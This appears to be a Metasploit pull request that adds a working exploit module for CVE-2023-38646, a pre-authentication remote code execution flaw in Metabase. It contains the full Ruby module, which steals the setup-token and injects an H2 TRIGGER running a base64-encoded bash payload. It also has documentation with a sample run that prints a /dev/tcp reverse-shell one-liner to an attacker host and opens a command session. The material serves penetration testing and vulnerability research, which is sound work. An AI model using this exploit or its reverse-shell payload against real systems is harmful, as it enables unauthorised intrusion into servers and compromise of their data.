### PR TITLE
metabase setup token rce (cve-2023-38646)

### DIFF
--- a/documentation/modules/exploit/linux/http/metabase_setup_token_rce.md
+++ b/documentation/modules/exploit/linux/http/metabase_setup_token_rce.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+
+Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
+is accessible even after the setup process has been completed. With this token
+a user is able to submit the setup functionality to create a new database.
+When creating a new database, an H2 database string is created with a TRIGGER
+that allows for code execution. We use a sample database for our connection
+string to prevent corrupting real databases.
+
+Successfully tested against Metabase 0.46.6.
+
+### Install
+
+```
+docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/metabase_setup_token_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Metabase 0.46.6 on Docker
+
+```
+msf6 > use exploit/linux/http/metabase_setup_token_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
+lhost => 111.111.11.111
+msf6 exploit(linux/http/metabase_setup_token_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/metabase_setup_token_rce) > exploit
+
+[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
+[*] Started reverse TCP handler on 111.111.11.111:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.46.6
+[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
+[*] Sending exploit
+[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000
+
+id
+uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
+```

--- a/modules/exploits/linux/http/metabase_setup_token_rce.rb
+++ b/modules/exploits/linux/http/metabase_setup_token_rce.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_boostrab_json_blob_from_html_resp(html)
-    %r{<script type="application/json" id="_metabaseBootstrap">(.*?)</script>} =~ html
+    %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
     begin
       JSON.parse(Regexp.last_match(1))
     rescue JSON::ParserError
@@ -82,6 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
     json = get_boostrab_json_blob_from_html_resp(res.body)
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     version = json.dig('version', 'tag')
     return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
 
@@ -103,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
     json = get_boostrab_json_blob_from_html_resp(res.body)
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     setup_token = json['setup-token']
     if setup_token.nil?
       print_status('Setup token is nil, checking secondary location')
@@ -135,16 +137,16 @@ class MetasploitModule < Msf::Exploit::Remote
         'token' => setup_token,
         'details' =>
           {
-            'is_on_demand' => false,
-            'is_full_sync' => false,
-            'is_sample' => false,
-            'cache_ttl' => nil,
-            'refingerprint' => false,
-            'auto_run_queries' => true,
-            'schedules' => {},
+            # 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get
+            # 'is_full_sync' => false,
+            # 'is_sample' => false,
+            # 'cache_ttl' => nil,
+            # 'refingerprint' => false,
+            # 'auto_run_queries' => true,
+            # 'schedules' => {},
             'details' =>
               {
-                'db' => "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+                'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
                 'advanced-options' => false,
                 'ssl' => true
               },

--- a/modules/exploits/linux/http/metabase_setup_token_rce.rb
+++ b/modules/exploits/linux/http/metabase_setup_token_rce.rb
@@ -1,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Metabase Setup Token RCE',
+        'Description' => %q{
+          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
+          is accessible even after the setup process has been completed. With this token
+          a user is able to submit the setup functionality to create a new database.
+          When creating a new database, an H2 database string is created with a TRIGGER
+          that allows for code execution. We use a sample database for our connection
+          string to prevent corrupting real databases.
+
+          Successfully tested against Metabase 0.46.6.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Maxwell Garrett', # original PoC, analysis
+          'Shubham Shah' # original PoC, analysis
+        ],
+        'References' => [
+          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],
+          ['URL', 'https://www.metabase.com/blog/security-advisory'],
+          ['CVE', '2023-38646']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-22',
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+      ]
+    )
+  end
+
+  def get_boostrab_json_blob_from_html_resp(html)
+    %r{<script type="application/json" id="_metabaseBootstrap">(.*?)</script>} =~ html
+    begin
+      JSON.parse(Regexp.last_match(1))
+    rescue JSON::ParserError
+      print_bad('Unable to parse JSON blob')
+      nil
+    end
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    json = get_boostrab_json_blob_from_html_resp(res.body)
+    version = json.dig('version', 'tag')
+    return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
+
+    # typically v0.46.6
+    version = version.gsub('v', '')
+
+    if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')
+      return CheckCode::Appears("Version Detected: #{version}")
+    end
+
+    CheckCode::Safe("Version not vulnerable: #{version}")
+  end
+
+  def exploit
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+    json = get_boostrab_json_blob_from_html_resp(res.body)
+    setup_token = json['setup-token']
+    if setup_token.nil?
+      print_status('Setup token is nil, checking secondary location')
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),
+        'method' => 'GET'
+      )
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+      json = res.get_json_document
+      setup_token = json['setup-token']
+    end
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?
+    print_good("Found setup token: #{setup_token}")
+
+    print_status('Sending exploit')
+    # our payload can't have = in it, so we'll need to remove them adding spaces to the end of the payload
+    b64_pe = ::Base64.strict_encode64(payload.encoded)
+    equals_count = b64_pe.count('=')
+    if equals_count > 0
+      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
+
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        'token' => setup_token,
+        'details' =>
+          {
+            'is_on_demand' => false,
+            'is_full_sync' => false,
+            'is_sample' => false,
+            'cache_ttl' => nil,
+            'refingerprint' => false,
+            'auto_run_queries' => true,
+            'schedules' => {},
+            'details' =>
+              {
+                'db' => "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
+                'advanced-options' => false,
+                'ssl' => true
+              },
+            'name' => Rex::Text.rand_text_alphanumeric(6..12),
+            'engine' => 'h2'
+          }
+      }.to_json
+    )
+  end
+end

--- a/modules/exploits/linux/http/metabase_setup_token_rce.rb
+++ b/modules/exploits/linux/http/metabase_setup_token_rce.rb
@@ -62,11 +62,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def get_boostrab_json_blob_from_html_resp(html)
+  def get_bootstrap_json_blob_from_html_resp(html)
     %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
     begin
       JSON.parse(Regexp.last_match(1))
-    rescue JSON::ParserError
+    rescue JSON::ParserError, TypeError
       print_bad('Unable to parse JSON blob')
       nil
     end
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    json = get_boostrab_json_blob_from_html_resp(res.body)
+    json = get_bootstrap_json_blob_from_html_resp(res.body)
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     version = json.dig('version', 'tag')
     return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    json = get_boostrab_json_blob_from_html_resp(res.body)
+    json = get_bootstrap_json_blob_from_html_resp(res.body)
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     setup_token = json['setup-token']
     if setup_token.nil?
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?
     print_good("Found setup token: #{setup_token}")
 
-    print_status('Sending exploit')
+    print_status('Sending exploit (may take a few seconds)')
     # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
     b64_pe = ::Base64.strict_encode64(payload.encoded)
     equals_count = b64_pe.count('=')

--- a/modules/exploits/linux/http/metabase_setup_token_rce.rb
+++ b/modules/exploits/linux/http/metabase_setup_token_rce.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2023-07-22',
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -121,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Found setup token: #{setup_token}")
 
     print_status('Sending exploit')
-    # our payload can't have = in it, so we'll need to remove them adding spaces to the end of the payload
+    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
     b64_pe = ::Base64.strict_encode64(payload.encoded)
     equals_count = b64_pe.count('=')
     if equals_count > 0


### PR DESCRIPTION
This PR adds a module for CVE-2023-38646, an unauth RCE against metabase.

Metabase has a bug where an unauth user can retrieve a `setup-token`. With this, they can query an API endpoint to setup a new database, then inject an H2 connection string RCE (similar to my previous module). Pretty simple, not a lot of steps involved.

## Verification

- [x] Start msfconsole
- [x] Do: `use exploit/linux/http/metabase_setup_token_rce`
- [x] Do: `set rhosts [ip]`
- [x] Do: `run`
- [x] You should get a shell.
